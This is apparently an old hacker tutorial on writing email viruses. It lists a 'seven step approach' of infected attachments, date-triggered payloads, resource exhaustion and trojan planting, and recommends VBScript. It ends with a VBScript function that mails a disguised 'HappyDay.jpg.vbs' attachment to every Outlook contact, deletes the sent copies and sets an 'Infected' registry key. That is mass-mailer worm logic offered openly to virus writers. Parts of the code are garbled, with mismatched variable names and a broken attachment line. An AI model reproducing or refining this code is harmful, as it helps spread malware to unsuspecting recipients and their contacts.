The Methodology:
The methodology upon which this art sets into practical environment. It consists of seven step approach.
I am not discussing them in detail but only show you the layouts of the key points that are necessary
components to write a simple infection program for email client.
It goes Like this:-
Mode Of Penetration:
The email viruses are always enters your network through vague emails or simply as an attracted attachment.
The attachment consists of some malicious code that sets in system as soon as you opened it.
Resident Specificity:
The code which comes with the attachment is in hidden state or encrypted state which becomes resident in
system specific files and manipulate it according to the code defined for it.
Time Sarcasm:
This is the wayside entity relates to the execution of code with some defined time statistics on it.
Till the specific date the virus remains silent and after due date the penetration starts .This is very
good technique for the setting up of execution environment for delaying the effects. Thats why some Date
driven email viruses built on this effect.
Malicious code Execution:
This relates to the stuff present in the code. It entirely relates to coding art of virus writer whether
he wants the pornography to be ejaculated form it or any kind of action that hampers the normal functioning
of systems.
Consuming System Resources:
Some email viruses are written entirely to consume up the resources of the system leaving it behind as dead system.
This is used extremely in very devastating environment.
Trojan Planting:
The email viruses are also being coded that plants a trojan on the remote system so that access can be possible
on the fly. These are key points always sets in mind of virus writers to write email viruses.
Object Panorma:
This relates to the creation of objects that inherits the system properties.The object creation is defined in
scripting language.VbScript is the far most desired language of virus writers.It provides awesome properties
that are being manipulated by the writers.
Objects:-
A) windows scripting object
B) windows shell object
C) windows filesystem object
D) windows application object
E) windows OLE object
Set ShellObject = CreateObject("WScript.shell")
Once this object is completed , the shell is ready to execute functions that are related to it.I think this all
scripters know.
Set FileObject = CreateObject("Scripting.fileSystemObject")
This object as you already know will use the file related operations.
Set Object = CreateObject("Outlook.Application")
This object creates a handle to the outlook application for undertaking mail functions These are the basic
three objects that are being used as a elements to write email viruses.
Example:The very generic function which let the outlook mail client to get infected
Function Manifesting_Outlook()
' On Error Resume Next
' Set Z2450x001 = CreateObject("Outlook.Application")
' if Z2450x001 = "Outlook" Then
' Set Z2450x002 = Z2450x001.GetNameSpace("MAPI")
' Set Z2450x003 = Z2450x002.AddressLists
' For Each ObjZ2450x004 in Z2450x003
' if ObjZ2450x004.AddressEntries.Count <> 0 Then
' For Z2450x005 = 1 to ObjZ2450x004
' Set Z2450x007 = Z2450x001.CreateItem(0)
' Set Z2450x008 = ObjZ2450x004.AddressEntries(Z2450x005)
' Z2450x007.To = Z2450x008.Address
' Z2450x007.Subject = "GIFT,:)"
'
' if Z2450x007.Subject = "" Then
' Z2450x007.Subject = "Hoorah!!!!!"
' End If
' Z2450x007.Body = "Hi:You Got Happy Day Gift " [] vbcrlf [] "Hit It" []
vbcrlf [] ""
' Set Z2450x009 = Z2450x007.Attachments
ObjZ2450x0011.Add
ObjFileSystem00x.GetSpecialFolder(0)"\HappyDay.jpg.vbs"
' Z2450x007.DeleteAfterSubmit = True
' if Z2450x007.To <> "" Then
' Z2450x007.Send
' ObjRegWrite00x.RegWrite "HKCU\software\BootLicker\Infected","1"
' End If
' Next
' End If
' Next
' End if
[] have been replaced with ampersand